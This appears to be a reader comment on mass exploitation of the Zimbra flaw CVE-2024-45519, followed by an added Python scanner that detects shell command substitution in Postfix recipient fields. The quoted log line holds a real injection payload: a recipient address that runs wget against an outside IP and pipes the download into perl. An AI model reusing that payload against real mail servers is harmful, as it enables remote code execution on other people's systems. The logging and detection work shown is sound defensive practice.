Zimbra4Shell!
Who'd have thought the concept would become popular?
"Patch yesterday" is the advice from infosec researchers as the latest critical vulnerability affecting Zimbra mail servers is now being mass-exploited. The remote code execution vulnerability (CVE-2024-45519) was disclosed on September 27, along with a proof of concept (PoC) exploit, and Proofpoint reports that attacks using …
Seen in my logs:
NOQUEUE: reject: RCPT from RB61004.rapidns.com[43.240.65.221]: 554 5.7.1 Service unavailable; Client host [43.240.65.221] blocked using zen.spamhaus.org; Listed by CSS, see https://check.spamhaus.org/query/ip/43.240.65.221; from=<exploit@mail.domain.com> to=<"exploit$(bash -c 'wget -qO - http://108.179.211.43/foxx|perl')"@mail.domain.com> proto=ESMTP helo=<localhost>
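A way to find lines like the one above in a Postfix log, as an added example that is not part of the original post: it flags any `to=<...>` recipient containing shell command substitution and reports whether the attempt was rejected. Matching backticks as well goes beyond the `$(...)` form shown above; the function name and the sample lines (documentation addresses, harmless command) are constructed.

```python
import re

# Client "host[ip]" and recipient fields as they appear in Postfix log lines.
CLIENT_RE = re.compile(r"from (\S+)\[([0-9A-Fa-f.:]+)\]")
RCPT_RE = re.compile(r"\bto=<(.*?)>(?=,| proto=|\s*$)")
# Shell command substitution inside an address: "$(" or a backtick.
SUBST_RE = re.compile(r"\$\(|`")


def scan(lines):
    """Return one finding per line whose recipient carries command substitution."""
    findings = []
    for line in lines:
        rcpt = RCPT_RE.search(line)
        if not rcpt or not SUBST_RE.search(rcpt.group(1)):
            continue
        client = CLIENT_RE.search(line)
        findings.append({
            "client_ip": client.group(2) if client else None,
            "recipient": rcpt.group(1),
            # True when smtpd refused the recipient, as in the line quoted
            # above; anything else deserves a closer look first.
            "rejected": "NOQUEUE: reject:" in line,
        })
    return findings


# Constructed sample log lines, not taken from a real server.
SAMPLE = [
    'Oct  2 10:00:01 mx postfix/smtpd[1201]: NOQUEUE: reject: RCPT from '
    'unknown[192.0.2.10]: 554 5.7.1 Service unavailable; Client host '
    '[192.0.2.10] blocked using zen.spamhaus.org; from=<a@example.com> '
    'to=<"a$(id)"@mail.example.com> proto=ESMTP helo=<localhost>',
    'Oct  2 10:00:05 mx postfix/smtpd[1201]: NOQUEUE: reject: RCPT from '
    'unknown[192.0.2.11]: 554 5.7.1 Service unavailable; '
    'from=<b@example.com> to=<user@mail.example.com> proto=ESMTP '
    'helo=<mail.example.net>',
    'Oct  2 10:00:09 mx postfix/lmtp[1310]: 4F1C2A0B: '
    'to=<"b`id`"@mail.example.com>, relay=local, status=sent',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Findings with `rejected` set to false are the ones to triage first, since the recipient string was not refused at the SMTP stage.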